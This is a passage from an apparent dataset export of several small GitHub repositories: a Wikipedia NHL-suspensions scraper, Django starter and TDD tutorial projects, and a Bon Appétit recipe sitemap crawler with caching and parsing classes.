fine]\r\n \r\n \r\ndef fines_table_oldstyle(table):\r\n '''\r\n Older Wikipedia tables did not contain the date which the fines were \r\n applied and this shifted the data around. As such, a new function was\r\n created\r\n '''\r\n \r\n rows = table.find_all('tr')\r\n for row in rows[1:]:\r\n td = row.find_all('td')\r\n # Get the date of offense\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n # Get the offender's name \r\n try:\r\n offender = td[1].find('span').text\r\n except AttributeError:\r\n offender = td[1].text\r\n # Get offending team\r\n off_team = td[2].text\r\n # Get the offense\r\n offense = td[3].text\r\n # Get the day the DoPS made a decision\r\n dops_date = np.nan\r\n susp = 0\r\n forfeit_sal = np.nan\r\n # Get the fine amount\r\n fine = td[4].text\r\n \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n \r\n\r\ndef detect_page_table_type(page):\r\n '''\r\n Reads which year the Wiki pages covers and returns the appropriate \r\n number of table headers to read in. 
\r\n    '''\r\n    header_count = {\r\n        '2016': [10, 8],\r\n        '2015': [10, 8],\r\n        '2014': [10, 8],\r\n        '2013': [11, 9],\r\n        '2012': [6, 6],\r\n        '2011': [6, 6],\r\n        '2010': [5, 5],\r\n        '2009': [5, 5],\r\n    }\r\n\r\n    year = page[0:4]\r\n\r\n    return header_count[year][0], header_count[year][1]\r\n\r\n# Scrape each Wiki page for its tables\r\nfor page in pages:\r\n    print(page)\r\n    r = requests.get(url + page)\r\n    bs = BeautifulSoup(r.text, features='lxml-xml')\r\n    tables = bs.find_all('table', {'class':'wikitable sortable'})\r\n\r\n    # Find the style of table by year\r\n    susp_len, fine_len = detect_page_table_type(page)\r\n\r\n    # Extract the data according to table type\r\n    if susp_len > 6:\r\n        for table in tables:\r\n            headers = table.find_all('th')\r\n            if len(headers) == susp_len:\r\n                suspension_table(table)\r\n            elif len(headers) == fine_len:\r\n                fines_table(table)\r\n            else:\r\n                continue\r\n    elif susp_len == 6:\r\n        for table in tables:\r\n            # Fine and suspensions are of equal length\r\n            # Searching for length will determine type\r\n            if '<th>Length</th>' in str(table.find_all('th')):\r\n                suspension_table(table)\r\n            else:\r\n                fines_table(table)\r\n    else:\r\n        susp_table_oldstyle(tables[0])\r\n        fines_table_oldstyle(tables[1])\r\n    print(len(dops_df))\r\n\r\ndops_df.to_csv('NHL_Suspensions.csv')"
}
] | 4 |
Haury-Tech/Melanated-Mamas
|
https://github.com/Haury-Tech/Melanated-Mamas
|
3baddf4ae811600f6a0d26c052ce57995fcd3f42
|
1a0d12f95ebe59ff24572d3c98e524cce89c83b0
|
c3558f7f78474ea1ba30410554da6f13a8484008
|
refs/heads/master
| 2023-04-18T04:01:36.111564 | 2021-04-27T00:06:30 | 2021-04-27T00:06:30 | 358,256,763 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 17,
"blob_id": "6e8a3b30c01206be580cf3d0cb1788b59efc7837",
"content_id": "bda0f31e4247c076e8ed5857a828caecf877013d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 18,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 1,
"path": "/README.md",
"repo_name": "Haury-Tech/Melanated-Mamas",
"src_encoding": "UTF-8",
"text": "# Melanated-Mamas\n"
},
{
"alpha_fraction": 0.7290167808532715,
"alphanum_fraction": 0.7290167808532715,
"avg_line_length": 28.714284896850586,
"blob_id": "7c3200bad2457d812623ad119ee2058f12610764",
"content_id": "812ae00b4d4c8c9903cf01fe82591d1dde79610a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 14,
"path": "/comptes/views.py",
"repo_name": "Haury-Tech/Melanated-Mamas",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.http import HttpResponse\n\n# Create your views here.\n\n\ndef index(request):\n #return HttpResponse(\"Hello, world. You're at the account index.\")\n return render(request, 'comptes/pages/index.html', locals())\n\ndef login(request):\n #return HttpResponse(\"Hello, world. You're at the account index.\")\n return render(request, 'comptes/pages/login.html', locals())\n\n"
},
{
"alpha_fraction": 0.47891566157341003,
"alphanum_fraction": 0.6987951993942261,
"avg_line_length": 15.600000381469727,
"blob_id": "2c1d4c310320caeee9d4342514f2b72e7b48644a",
"content_id": "3477d7dd09d97139ef26ccdd2b4538d5eab2ae93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "Haury-Tech/Melanated-Mamas",
"src_encoding": "UTF-8",
"text": "asgiref==3.3.4\ncertifi==2020.12.5\ncffi==1.14.5\nchardet==4.0.0\ncryptography==3.4.7\ndefusedxml==0.7.1\nDjango==3.0.5\ndjango-allauth==0.44.0\ndjongo==1.3.4\nidna==2.10\noauthlib==3.1.0\npycparser==2.20\nPyJWT==2.0.1\npymongo==3.11.3\npython3-openid==3.2.0\npytz==2021.1\nrequests==2.25.1\nrequests-oauthlib==1.3.0\nsqlparse==0.2.4\nurllib3==1.26.4\n"
}
] | 3 |
dcroc16/superlists
|
https://github.com/dcroc16/superlists
|
bf0aac312c524ada596aeae3deb1b16218a0f108
|
a88223022ef8293f8768933fbb50cc69fa8484b8
|
15465ffb90cce4166bfa51e4666680b330cd00ec
|
refs/heads/master
| 2021-01-23T07:09:30.576030 | 2015-02-08T05:42:35 | 2015-02-08T05:42:35 | 30,478,876 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8387096524238586,
"alphanum_fraction": 0.8387096524238586,
"avg_line_length": 30,
"blob_id": "8298304ee880c80002c6e1784d036afffe4e4331",
"content_id": "8445a27ba06c6ae8def880ae29eeff9e166abf83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 62,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 2,
"path": "/README.md",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "# superlists\nCreating a website using Test Driven Development\n"
},
{
"alpha_fraction": 0.7042071223258972,
"alphanum_fraction": 0.708737850189209,
"avg_line_length": 27.629629135131836,
"blob_id": "838f0cc726380fa47425a1db08eb8cf1379b9ee3",
"content_id": "739ebf3c0a89900ec47d5e072f57881111fbae2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1545,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 54,
"path": "/functional_tests.py",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass NewVisitorTest(unittest.TestCase):\n\tdef setup(self):\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\n\tdef test_creating_a_new_list(self):\n\t\tself.setup()\n\n\t\t# User Stories\n\t\t# Edith heard about a cool new online todo app, She goes\n\t\t# to check out its homepage\n\n\t\tself.browser.get('localhost:8000')\n\n\t\t# She notices the page title and header mention to-do lists\n\t\tself.assertEqual('To-Do lists', self.browser.title)\n\t\theader_text = self.browser.find_element_by_id('h1').text\n\t\tself.assertIn('To-Do',header_text)\n\n\n\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertEqual(\n\t\t\tinputbox.get_attribute('placeholder'),\n\t\t\t'Enter a to-do item'\n\t\t\t)\n\t\t# She is invited to enter a to-do item straight away\n\t\t\n\n\t\t# She types \"Buy Peacock Feathers\" into a text box (Edith's Hoby)\n\t\tinputbox.send_keys(Keys.ENTER)\n\n\t\ttable = self.browser.find_element_by_id('id_list_table')\n\t\trows = table.find_element_by_id('tr')\n\t\tself.assertTrue(\n\t\t\t\tany(row.text == '1: Buy peacock feathers' for row in rows)\n\t\t\t)\n\t\tself.fail('Finish the test!')\n\n\t\t# There is still a text box inviting her to add another item\n\t\t# Edith wonders whether the site will remember her list.\n\t\t# Then she sees that the site has generated a unique URL for her ==\n\t\t# She visits that URL - her to-do list is still there.\n\t\t# satisfied she goes back to sleep\n\nif __name__ == '__main__':\n\tunittest.main()"
},
{
"alpha_fraction": 0.7828947305679321,
"alphanum_fraction": 0.7828947305679321,
"avg_line_length": 24.5,
"blob_id": "8a5174ce416a6ff325f70a67237b02233b02d3fd",
"content_id": "e13e063f0a99b879ffb957d31bc3b5abc3771460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 6,
"path": "/superlists/lists/views.py",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Create your views here.\ndef home_page(res):\n\treturn render(res, 'home.html')"
},
{
"alpha_fraction": 0.745233952999115,
"alphanum_fraction": 0.745233952999115,
"avg_line_length": 29.36842155456543,
"blob_id": "4b4bb657ffbd2d932e50a76f3fda1de71f74d5ae",
"content_id": "4d7e87d5b2a8609c018412fdb66c48037c4ccdfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 577,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/superlists/lists/tests.py",
"repo_name": "dcroc16/superlists",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase\nfrom django.http import HttpRequest\nfrom django.core.urlresolvers import resolve\n\nfrom lists.views import home_page\n\n# Create your tests here.\nclass HomePageTest(TestCase):\n\n\tdef test_root_url_resolves_to_home_page_view(self):\n\t\tfound = resolve('/')\n\t\tself.assertEqual(found.func, home_page)\n\n\tdef test_home_page_returns_correct_html(self):\n\t\tr = HttpRequest()\n\t\tres = home_page(r)\n\t\tself.assertTrue(res.content.startswith('<html>'))\n\t\tself.assertIn('<title>To-Do lists</title>', res.content)\n\t\tself.assertTrue(res.content.endswith('</html>'))\n"
}
] | 4 |
jdevries3133/scrape-recepies
|
https://github.com/jdevries3133/scrape-recepies
|
bf182faad7265dfb27d477096116794eaa07ea62
|
c97bef237fe17ff1c11f70918affc505f2629ec4
|
19d0bea7e17c9f5cd0d3fa4938dfcdf952770c30
|
refs/heads/master
| 2021-05-21T05:35:29.724452 | 2021-02-16T02:28:55 | 2021-02-16T02:28:55 | 252,569,124 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4920634925365448,
"alphanum_fraction": 0.6961451172828674,
"avg_line_length": 15.961538314819336,
"blob_id": "d3653fd3937a23d07abc0fa1209bf9e183b2264e",
"content_id": "de6c34c59f05c5b7d5bc1ea89c93f6f2789ecf93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 441,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 26,
"path": "/requirements.txt",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "appnope==0.1.0\nbackcall==0.1.0\nbeautifulsoup4==4.8.2\ncertifi==2019.11.28\nchardet==3.0.4\ndecorator==4.4.2\nfaster-than-requests==0.9.8\nidna==2.9\nipython==7.13.0\nipython-genutils==0.2.0\njedi==0.16.0\nline-profiler==3.0.2\nlxml==4.6.2\nparso==0.6.2\npexpect==4.8.0\npickleshare==0.7.5\nprompt-toolkit==3.0.5\nptyprocess==0.6.0\npycurl==7.43.0.5\nPygments==2.6.1\nrequests==2.23.0\nsix==1.14.0\nsoupsieve==2.0\ntraitlets==4.3.3\nurllib3==1.25.8\nwcwidth==0.1.9\n"
},
{
"alpha_fraction": 0.5204903483390808,
"alphanum_fraction": 0.524810254573822,
"avg_line_length": 29.80935287475586,
"blob_id": "9eb63a8e4ed42712045baf461785e74b479a7e63",
"content_id": "4406d5242e75aef6baf6718db905499afbef210c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8565,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 278,
"path": "/recipe_finder/site_crawlers/abc_crawlers.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC, abstractmethod\nfrom datetime import datetime\nfrom io import BytesIO\nimport logging\nimport os\nimport shelve\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nimport certifi\nimport pycurl\n\nlogging.basicConfig(\n filename='abc_crawlers.log',\n level='DEBUG',\n filemode='w',\n format='%(asctime)s %(levelname)-8s %(message)s'\n)\n\nclass Crawler(ABC):\n def __init__(self, sitemap_url, context):\n \"\"\"\n Things to put in context:\n Site name (string)\n Cache key\n \"\"\"\n self.sitemap = sitemap_url\n self.context = context\n\n # there should be a separate cache created for every new child\n self.cache_dir = (\n os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n 'cache'\n )\n )\n\n # all instances will use the same database\n self.cache_path = os.path.join(\n self.cache_dir,\n 'crawler_cache'\n )\n\n if self.context['read cache']:\n self.url_dict = self.read_cache_func()\n else:\n self.url_dict = {}\n\n if self.context['debug mode']:\n self.html_dir = os.path.join(self.cache_dir, 'html_pages')\n\n def write_cache_func(self):\n with shelve.open(self.cache_path, protocol=5) as db:\n db[self.context['cache key']] = self.url_dict\n\n def read_cache_func(self):\n with shelve.open(self.cache_path, protocol=5) as db:\n cached_url_dict = db[self.context['cache key']]\n return cached_url_dict\n\n def cache_recipe_page_responses(self):\n \"\"\"\n Make a request to all the recipe pages, and save them in the\n database.\n\n Make a locally stored html page for each response, which we can\n use for development.\n\n '2014_3_week_4.html'\n\n dict = {\n 'url groups': {\n 'recipe pages': {\n 'parent url': [child urls],\n 'parent url2': [child urls2],\n }\n 'other urls': {\n 'parent url': [other urls],\n (etc)\n }\n }\n }\n \"\"\"\n logging.debug('Pulling recipe pages.')\n # dict data => [(url, (context))] --- that'll be var \"input_list\"\n tuples_for_func = []\n # context = {'supercat': 'super', 'subcat': 'sub'}\n for sg_name, sg_content in self.url_dict['url groups'].items():\n # sg_content will be a dict {'parent': [children]}\n for parent, children in sg_content.items():\n context = {'supercat': sg_name, 'subcat': parent}\n for child in children:\n tuples_for_func.append(\n (child, context)\n )\n logging.debug('Making requests to recipe pages')\n\n for i in range(0, len(tuples_for_func), 500):\n # run operation on a subset at a time, to avoid memory binding.\n subset = tuples_for_func[i:(i + 500)]\n logging.debug(f'Saving the following pages:\\n{subset}')\n\n # results are going to be (response, url, context)\n results = self.multithread_requests(subset)\n logging.debug(f'Got results: {len(results)}')\n mthr_saves = []\n for result in results:\n # (html, url, context)]\n folder = os.path.join(self.html_dir, result[2]['supercat'])\n if not os.path.exists(folder):\n os.mkdir(folder)\n\n # make filename\n fn1 = self.parse_parent(result[2]['subcat'])\n fn2 = self.file_name_from_url(result[1])\n filename = f'{fn1} {fn2}.html'\n path = os.path.join(folder, filename)\n\n mthr_saves.append((path, result[0]))\n\n\n with ThreadPoolExecutor(max_workers=200) as executor:\n threads = executor.map(self.multithreaded_html_save, mthr_saves)\n\n def cache_state(self):\n # walk through cache\n # return super-categories\n # return length of each\n # return average creation date\n supercats = [item for item in os.listdir(self.html_dir) if item [0] != '.']\n\n\n return_dict = {'html_dir': self.html_dir, 'supercats': {}}\n\n for folder in supercats:\n 
creation_dates = []\n for file in os.listdir(os.path.join(self.html_dir, folder)):\n unix_creation = os.path.getmtime(\n os.path.join(self.html_dir, folder, file))\n\n creation_dates.append(unix_creation)\n\n avg_timestamp = sum(creation_dates) // len(creation_dates)\n date = datetime.fromtimestamp(avg_timestamp)\n return_dict['supercats'][folder] = {\n 'num_of_files': len(os.listdir(os.path.join(self.html_dir, folder))),\n 'avg_creation_date': date\n }\n\n return return_dict\n\n\n def multithreaded_html_save(self, tupl):\n path, html = tupl\n with open(path, 'w') as file:\n file.write(html)\n logging.debug(f'Saved {path} to the hard drive.')\n\n\n def cache_urls(self):\n # reference 'read debug cache' attribute\n write_cache = not self.context['read debug cache']\n\n # read cache\n if not write_cache:\n with shelve.open(self.cache_path, protocol=5) as db:\n self.all_urls = db[self.context['url cache key']]\n\n # write cache\n if write_cache:\n\n # check for self.all_urls attribute\n if not hasattr(self, 'all_urls'):\n raise Exception(\n 'Cannot cache urls, because self.get_urls() has '\n 'not yet been called, and self.all_urls is not defined.'\n )\n\n # write\n with shelve.open(self.cache_path, protocol=5) as db:\n db[self.context['url cache key']] = self.all_urls\n\n logging.debug(f'lpc: {self.all_urls}')\n\n return self.all_urls\n\n def multithread_requests(self, urls):\n\n if isinstance(urls[0], tuple):\n mode = 'tuples'\n\n if isinstance(urls[0], str):\n mode = 'regular'\n\n response_and_url = []\n with ThreadPoolExecutor(max_workers=200) as executor:\n if mode == 'regular':\n threads = [\n executor.submit(\n self.make_pycurl_request, url\n )\n for url\n in urls\n ]\n\n if mode == 'tuples':\n threads = [\n executor.submit(\n self.make_pycurl_request, url, context\n )\n for url, context\n in urls\n ]\n\n\n for r in as_completed(threads):\n try:\n response_and_url.append(r.result())\n\n except Exception as e:\n logging.warning(e)\n\n return response_and_url\n\n def make_pycurl_request(self, url, context=None):\n try:\n buffer = BytesIO()\n crl = pycurl.Curl()\n crl.setopt(crl.URL, url)\n crl.setopt(crl.WRITEDATA, buffer)\n crl.setopt(crl.CAINFO, certifi.where())\n crl.perform()\n\n crl.close()\n\n logging.debug(f'response recieved from {url}')\n\n except Exception as e:\n raise Exception(f'{url} failed because of {e}.')\n\n if context:\n return buffer.getvalue().decode(), url, context\n\n return buffer.getvalue().decode(), url\n\n @abstractmethod\n def parse_parent(self):\n \"\"\"\n Parse the parent urls from the standard dict above, so that they\n can be used for folder or file names in the above method.\n \"\"\"\n pass\n\n @abstractmethod\n def get_urls(self):\n \"\"\"\n Recursively crawl through the site map, and get all\n urls for recipe pages.\n \"\"\"\n pass\n\n @abstractmethod\n def recursive(self, links_to_do, cache=False):\n \"\"\"\n Crawl through the sitemap, and get urls\n \"\"\"\n pass\n\n @abstractmethod\n def make_url_dict(self):\n \"\"\"\n Go through the recursively discovered list of urls, and filter them\n down to what we actually want; urls which are pages of recipes.\n \"\"\"\n pass\n\n @abstractmethod\n def file_name_from_url(self):\n pass\n"
},
{
"alpha_fraction": 0.7873753905296326,
"alphanum_fraction": 0.7873753905296326,
"avg_line_length": 29,
"blob_id": "216be3edd5b6b83a306c50edeebf278d24619600",
"content_id": "05e97b6ec1d5ea86ce37cc21b146448c632e7b14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 10,
"path": "/recipe_finder/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nOverall, this module aggregates recipes from all over the place. It will\nultimately return a recipe object instance for each recipe, consisting of the\nrecipe's name, ingredients, author, prep time, etc.\n\n\"\"\"\n\nfrom .site_crawlers import BonApetitCrawler\nfrom .html_parsers import BonApetitParser\n\n"
},
{
"alpha_fraction": 0.7773109078407288,
"alphanum_fraction": 0.7773109078407288,
"avg_line_length": 33.14285659790039,
"blob_id": "b6c0e1699cf4f3bfe12bf305e6772233d97b493f",
"content_id": "8c34180de6c53fb63938ff510555128b09aa2981",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 7,
"path": "/recipe_finder/recipe_objects/__init__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nThis module recieves clean data from the html_to_recipe_object parser module.\nUltimately, the best thing to do will probably be to use this module to begin to\nconsider how this data might find its way into a relational database.\n\n\"\"\""
},
{
"alpha_fraction": 0.6002277731895447,
"alphanum_fraction": 0.6002277731895447,
"avg_line_length": 34.119998931884766,
"blob_id": "c53649473fdf8d24a647d6d2f2ff4363adaf9515",
"content_id": "b82004cca0037e248f27651909e99d01918c76a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 878,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/recipe_finder/recipe_objects/abc_recipes.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC, abstractmethod\n\nclass Recipes:\n def __init__(self, title, ingredients, extra_info=None):\n \"\"\"\n Each recipe object represents one single recipe, from any given site.\n If this were developed into a django web app, this class would probably\n be altered into a model, which would store its instances in a database,\n and be drawn on by the front end.\n\n Important attributes for each recipe are:\n name\n author\n url\n ***ingredient list***\n prep time\n \"\"\"\n # these are the only two mandatory attributes\n self.title = title\n self.ingredients = ingredients\n\n # extra_info may include author, prep time, maybe others?\n if extra_info:\n for key, value in extra_info.items():\n setattr(self, key, value)\n"
},
{
"alpha_fraction": 0.6104850769042969,
"alphanum_fraction": 0.6134247779846191,
"avg_line_length": 25.86842155456543,
"blob_id": "44cd6ffe97d1db802117b43281967ecbc0edfa92",
"content_id": "5eede29e07eb9c8ba7b53f9c7f4076da6832a73f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2041,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 76,
"path": "/recipe_finder/recipe_objects/ba_recipes.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from abc import ABC\nfrom copy import copy\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom io import BytesIO\nimport logging\nimport os\nimport shelve\nimport time\nimport re\nimport sys\n\nimport certifi\nimport pycurl\nfrom bs4 import BeautifulSoup, SoupStrainer\n\nfrom parsers import Parsers\n\nlogging.basicConfig(\n filename='l_main.log',\n level='DEBUG',\n filemode='w',\n format='%(asctime)s %(levelname)-8s %(message)s'\n)\n\n\nclass BonApetitScrape:\n \"\"\"\n Each instance represents a single recipe scraped from the\n bon apetit website.\n \"\"\"\n def __init__(self, url):\n\n self.url = url\n self.data = self.gather_data()\n\n\n def gather_data(self):\n \"\"\"\n Act as assistant to the constructor, performing all of the tasks\n that must be performed every time the class is instantiated:\n\n * make request and soup\n * determine the generation (age) of the soup\n * route the soup to the appropriate parsing function\n * return data structure (dictionary) that includes all the\n information that we will want from the instance:\n * recipe url\n * recipe name\n * recipe author\n * recipe ingredients\n \"\"\"\n soup = self.get_page()\n parsed_soup = self.parse(soup)\n\n return parsed_soup\n\n def parse(self, soup):\n \"\"\"\n Determine the generation of the page's soup, and return a\n response code so that the page's soup can be parsed\n appropriately\n \"\"\"\n # todo determine parser to use\n\n parse_helper = Parsers(soup)\n parse_helper.bon_apetit_2020()\n return 'response_code'\n\n def get_page(self):\n \"\"\"\n Make the request, return the beautifulsoup object.\n \"\"\"\n response = BonApetitCrawler.make_pycurl_request(self.url)\n self.response = response\n soup = BeautifulSoup(response, features='lxml')\n return soup"
},
{
"alpha_fraction": 0.4923155605792999,
"alphanum_fraction": 0.4969262182712555,
"avg_line_length": 29.82105255126953,
"blob_id": "805816cd5e8025ea5ed31984c91e535917d08f27",
"content_id": "2451a38b96a8031c48ae77deddaf2d78b48f7679",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5856,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 190,
"path": "/recipe_finder/site_crawlers/ba_crawl.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "import logging\nimport re\n\nfrom bs4 import BeautifulSoup, SoupStrainer\n\nfrom .abc_crawlers import Crawler\n\n\nlogging.basicConfig(\n filename='ba_crawl.log',\n level='DEBUG',\n filemode='w',\n format='%(asctime)s %(levelname)-8s %(message)s'\n)\n\nclass BonApetitCrawler(Crawler):\n \"\"\"\n Crawl bon apetit website. Attributes after instantiation are all\n bon appetit recipe urls.\n \"\"\"\n def __init__(self, context):\n super().__init__(\n 'https://www.bonappetit.com/sitemap',\n context\n )\n\n def get_urls(self):\n \"\"\"\n Recursively crawl through the bon apetit website, and get all\n urls.\n\n *** this now returns ALL urls, unsorted.***\n \"\"\"\n\n if self.context['read debug cache']:\n return self.cache_urls()\n\n all_urls = self.recursive([self.sitemap])\n if all_urls == []:\n logging.error('recipe pages is empty.')\n\n self.all_urls = all_urls\n return all_urls\n\n def recursive(self, links_to_do):\n \"\"\"\n tuples_found is a list of tuples that we ultimately want.\n These tuples containe two items: the https response from a url,\n and then, the url itself:\n (https_response, url_requested)\n\n This list of tuples is only appended to if it is a leaf node of\n the sitemap tree.\n \"\"\"\n\n log_msg = (str(links_to_do))\n logging.debug('=' * 80)\n logging.debug(log_msg)\n\n lol_parent_children = []\n next_level = []\n resp_tuples = self.multithread_requests(links_to_do)\n for index, resp_tuple in enumerate(resp_tuples):\n resp, url = resp_tuple\n logging.debug(f'Processed {index} of {len(resp_tuples)} responses.')\n\n # make the soup, searches the soup\n strainer = SoupStrainer('a', class_='sitemap__link', href=True)\n soup = BeautifulSoup(\n resp,\n features='html.parser',\n parse_only=strainer\n )\n hrefs = soup.find_all(\n name='a',\n href=True,\n class_='sitemap__link',\n )\n\n try:\n hrefs[0].contents[0][0]\n except IndexError:\n continue\n\n if hrefs[0].contents[0][0] != '/':\n # url is a strng; the parent url.\n # hrefs is a list; the list of children of that parent\n lol_parent_children.append(\n (\n url,\n [\n 'https://www.bonappetit.com/' + href_tag.contents[0]\n for href_tag\n in hrefs\n ]\n )\n )\n\n if hrefs[0].contents[0][0] == '/':\n links_found = [\n 'https://www.bonappetit.com'\n + i.contents[0]\n for i\n in hrefs\n ]\n next_level += links_found\n\n logging.debug('NEXT_LEVEL_CALLED')\n logging.debug(next_level[:200])\n\n if next_level:\n logging.debug(f'Called self.recursive.')\n return self.recursive(next_level)\n\n if not next_level:\n logging.debug(\n 'entered if not. 
Parents and Children:'\n f'\\n{lol_parent_children}'\n )\n return lol_parent_children\n\n def make_url_dict(self):\n \"\"\"\n Sort the urls into a dict that can interact with the abstract base class\n again.\n\n dict = {\n 'url groups': {\n 'recipe pages': {\n 'parent url': [child urls],\n 'parent url2': [child urls2],\n }\n 'other urls': {\n 'parent url': [other urls],\n (etc)\n }\n }\n }\n\n note: this function must be called from outside, and we are not calling\n it, so the fact that it is unfinished does not affect our ability to get\n urls.\n \"\"\"\n # write to the cache, only if we are not already reading from it.\n if self.context['debug mode']:\n self.cache_urls()\n\n if not hasattr(self, 'all_urls'):\n raise Exception(\n 'Cannot sort urls, because self.get_urls has not '\n 'been called, and self.all_urls attribute is not yet defined.'\n )\n\n 'need to rewrite to output new data structure.'\n output_dict = {\n 'url groups': {'recipe pages': {}, 'other urls': {}}\n\n }\n for parent_url, child_urls in self.all_urls:\n output_dict['url groups']['recipe pages'].update(\n {parent_url:\n [url for url in child_urls if '/recipe/' in url]}\n )\n output_dict['url groups']['other urls'].update(\n {parent_url:\n [url for url in child_urls if '/recipe/' not in url]}\n )\n\n self.url_dict = output_dict\n return output_dict\n\n def scrape_recipes_from_page(self, url):\n \"\"\"\n Possibly get more recipies out of the the recipe slideshow\n pages, and other pages that contain recipe links\n \"\"\"\n pass\n\n def parse_parent(self, parent_url):\n # get year, month, and date from sitemap url\n pattern = (r'(\\d\\d\\d\\d)&month=(\\d+)&week=(\\d)')\n url_param_regex = re.compile(pattern)\n mo = re.search(url_param_regex, parent_url[40:])\n year, month, week = mo[1], mo[2], mo[3]\n date_string = f'{year}_{month}_week_{week}'\n\n return date_string\n\n def file_name_from_url(self, url):\n return url[34:].replace('-', ' ').title()\n"
},
{
"alpha_fraction": 0.6639344096183777,
"alphanum_fraction": 0.6639344096183777,
"avg_line_length": 23.46666717529297,
"blob_id": "ada9d155a817e29a9d260c9ef03287186d9ce871",
"content_id": "ef670a18613bfdd0cc1687582f55ed318ee5d5a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 366,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 15,
"path": "/recipe_finder/site_crawlers/__main__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from ba_crawl import BonApetitCrawler\n\nba_context = {\n 'site name': 'Bon Apetit',\n 'cache key': 'BA Cache',\n 'url cache key': 'all_urls',\n 'read cache': False,\n 'debug mode': True,\n 'read debug cache': True,\n}\n\ncrawler = BonApetitCrawler(ba_context)\nurls = crawler.get_urls()\nurl_dict = crawler.make_url_dict()\ncrawler.cache_recipe_page_responses()"
},
{
"alpha_fraction": 0.8219178318977356,
"alphanum_fraction": 0.8219178318977356,
"avg_line_length": 35.5,
"blob_id": "7eff8bb42469367922c7886411579e36717f8901",
"content_id": "2016b0658eedc675a6862e73826b1d8c2adc4ee6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 6,
"path": "/recipe_finder/__main__.py",
"repo_name": "jdevries3133/scrape-recepies",
"src_encoding": "UTF-8",
"text": "from site_crawlers import BonApetitCrawler, DebugContext\nfrom html_parsers import BonApetitParser\n\n# ba_crawler dev block\nba_crawler = BonApetitCrawler(DebugContext.ba_context)\nba_cache_state = ba_crawler.cache_state()\n"
},
{
"alpha_fraction": 0.45601436495780945,
"alphanum_fraction": 0.47109514474868774,
"avg_line_length": 27.428571701049805,
"blob_id": "211f14f3bcb309a45dc6d44234de6b2f4063cdb8",
"content_id": "f3caf0897115d3306db03350254a552ef8e70fc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
